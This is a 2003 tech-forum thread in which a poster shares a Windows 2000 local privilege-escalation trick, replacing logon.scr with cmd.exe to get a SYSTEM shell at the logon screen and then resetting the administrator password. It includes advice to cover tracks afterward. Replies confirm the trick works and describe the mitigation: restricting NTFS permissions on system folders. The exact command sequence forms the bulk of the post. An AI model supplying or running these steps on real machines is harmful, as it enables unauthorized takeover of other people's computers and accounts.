?
Solved

i have a new exploit for you all to figure a way round

Posted on 2003-02-20
11
Medium Priority
?
132 Views
Last Modified: 2013-12-04
This is straight for a brain child. It makes so much sense that no one ever thought to do it.
Enjoy. Also beware to change what you have done. Or any machine that you did the hack on will
show what you did when the screen saver comes up. The only hard part is finding your way to C:\prompt or ms-dos. So begin.


If you can log in as an account , drop to DOS start -> run -> cmd, at the C: prompt type the following (assuming default install locations)

C:\> cd \winnt\system32
C:\winnt\system32> copy logon.scr logon.scr.old
C:\winnt\system32> del logon.scr
C:\winnt\system32> copy cmd.exe logon.scr

Now log off the machine, logon.scr is the screen saver that will kick in after 15 minutes of not touching the keyboard/mouse at the logon screen. Wait 15-20 minutes and a DOS prompt with FULL SYSTEM rights will pop up, then just to
C:\> net user administrator <newpassword>
and then log in with the new account.

Try this, might work, as long as he didn't change default permissions on C:\winnt and C:\winnt\system32 you should be golden.


 
Credits:

Author:Will W.

 
0
Comment
Question by:wirehead203
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 6
  • 2
11 Comments
 
LVL 9

Expert Comment

by:MSGeek
ID: 7989242
To clarify, you are looking for a way around this exploit?  It does not even sond like you are sure it works?
0
 
LVL 1

Expert Comment

by:craigtin
ID: 7995330
I think you answer your own question.  If you allow full permisson to the system folders for users why do you care if they can rename a file?
0
 
LVL 9

Expert Comment

by:MSGeek
ID: 8009998
By the way, this exploit does work.  
0
Industry Leaders: We Want Your Opinion!

We value your feedback.

Take our survey and automatically be enter to win anyone of the following:
Yeti Cooler, Amazon eGift Card, and Movie eGift Card!

 
LVL 9

Expert Comment

by:MSGeek
ID: 8009999
By the way, this exploit does work.  
0
 
LVL 1

Accepted Solution

by:
craigtin earned 100 total points
ID: 8010072
even if you restrict users rights on the folders?
Then the command prompt must be using system privilage.
0
 
LVL 9

Assisted Solution

by:MSGeek
MSGeek earned 100 total points
ID: 8010251
If you change NTFS rights so they cannot del and copy (rename) the file your ok.  This will not work with default security settings for normal users in XP.  But it does in 2000 and 2000 Server
0
 

Expert Comment

by:CleanupPing
ID: 9070888
wirehead203:
This old question needs to be finalized -- accept an answer, split points, or get a refund.  For information on your options, please click here-> http:/help/closing.jsp#1 
EXPERTS:
Post your closing recommendations!  No comment means you don't care.
0
 
LVL 9

Expert Comment

by:MSGeek
ID: 9073148
wirehead.. how'd you make out with this.  MSGeek.
0
 
LVL 9

Expert Comment

by:MSGeek
ID: 11349154
Thanks Modulo.  MSGeek
0

Featured Post

On Demand Webinar: Networking for the Cloud Era

Did you know SD-WANs can improve network connectivity? Check out this webinar to learn how an SD-WAN simplified, one-click tool can help you migrate and manage data in the cloud.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

As I write this article, I am finishing cleanup from the Qakbot virus variant found in the wild on April 18, 2011.  It was a messy beast that had varying levels of infection, speculated as being dependent on how long it resided on the infected syste…
This is a guide to the following problem (not exclusive but here) on Windows: Users need our support and we supporters often use global administrative accounts to do this. Using these accounts safely is a real challenge. Any admin who takes se…
If you’ve ever visited a web page and noticed a cool font that you really liked the look of, but couldn’t figure out which font it was so that you could use it for your own work, then this video is for you! In this Micro Tutorial, you'll learn yo…
How to fix incompatible JVM issue while installing Eclipse While installing Eclipse in windows, got one error like above and unable to proceed with the installation. This video describes how to successfully install Eclipse. How to solve incompa…
Suggested Courses
Course of the Month12 days, 8 hours left to enroll

777 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question